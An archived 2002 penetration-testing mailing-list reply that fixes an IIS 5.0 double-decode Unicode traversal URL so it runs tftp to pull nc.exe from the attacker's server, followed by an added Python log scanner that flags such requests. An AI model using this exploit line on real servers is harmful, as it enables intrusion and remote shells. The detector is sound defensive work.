Penetration Testing mailing list archives

RE: Can't get a shell


From: "Coral J. Cook" <cjcook () nosc mil>
Date: Thu, 11 Jul 2002 11:54:12 -0700

-----Original Message-----
From: Gaziel, Avishay [mailto:agaziel () kpmg com]
Sent: Tuesday, July 09, 2002 9:33 AM
To: PEN-TEST () securityfocus com
Subject: Can't get a shell


Hi All,
Situation:
An IIS5.0 vulnerable to Unicode ("double Unicode", i.e. ..%255c.. etc.).
IIS sitting behind a firewall.
Problem:
host/scripts/..%255c.........../winnt/system32/cmd.exe?/tftp+-i+my
server+get+nc.exe doesn't work

Here is the correct format:

host/scripts/..%255c.........../winnt/system32/tftp?+"-i"+myserver+GET+nc.exe

Notice that cmd.exe is removed and that -i is quoted ("-i").
That should fix your problem.

R,
Coral
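
For defenders reading this thread, an added example (not part of the original post or the list archive): a Python check that percent-decodes each logged request URI until it stops changing and flags traversal sequences that only appear after more than one decode, which is the "..%255c" pattern discussed above. The log layout, field names and sample lines are constructed for illustration, and the check assumes the log records the URI as the client sent it.

```python
import re
from urllib.parse import unquote

MAX_ROUNDS = 5  # bound the decode loop
TRAVERSAL = re.compile(r"\.\.[\\/]")  # "../" or "..\" in decoded text

# Constructed sample log; field layout and addresses are illustrative.
SAMPLE_LOG = """\
#Fields: c-ip cs-method cs-uri sc-status
192.0.2.10 GET /default.htm 200
192.0.2.10 GET /docs/my%20report.htm 200
192.0.2.10 GET /docs/100%25.htm 200
198.51.100.7 GET /scripts/..%5c/winnt/system32/tftp.exe 404
198.51.100.7 GET /scripts/..%255c/winnt/system32/tftp.exe 200
198.51.100.7 GET /scripts/..%25255c/winnt/system32/tftp.exe 404
"""

def decode_until_stable(uri):
    """Percent-decode repeatedly until the text stops changing."""
    for _ in range(MAX_ROUNDS):
        decoded = unquote(uri, encoding="latin-1")
        if decoded == uri:
            break
        uri = decoded
    return uri

def classify(uri):
    """Return 'ok', 'traversal', or 'multi-encoded-traversal' for one URI."""
    if not TRAVERSAL.search(decode_until_stable(uri)):
        return "ok"  # e.g. "%20" or a literal "%25" in a file name
    # Visible after a single decode: a one-pass filter would already see it.
    if TRAVERSAL.search(unquote(uri, encoding="latin-1")):
        return "traversal"
    # Only appears after two or more decodes: the "..%255c" case.
    return "multi-encoded-traversal"

def scan(log_text):
    """Yield (client_ip, uri, status, verdict) for every flagged request."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            verdict = classify(row["cs-uri"])
            if verdict != "ok":
                yield row["c-ip"], row["cs-uri"], row["sc-status"], verdict

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

A flagged request that returned status 200 is the one to investigate first.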


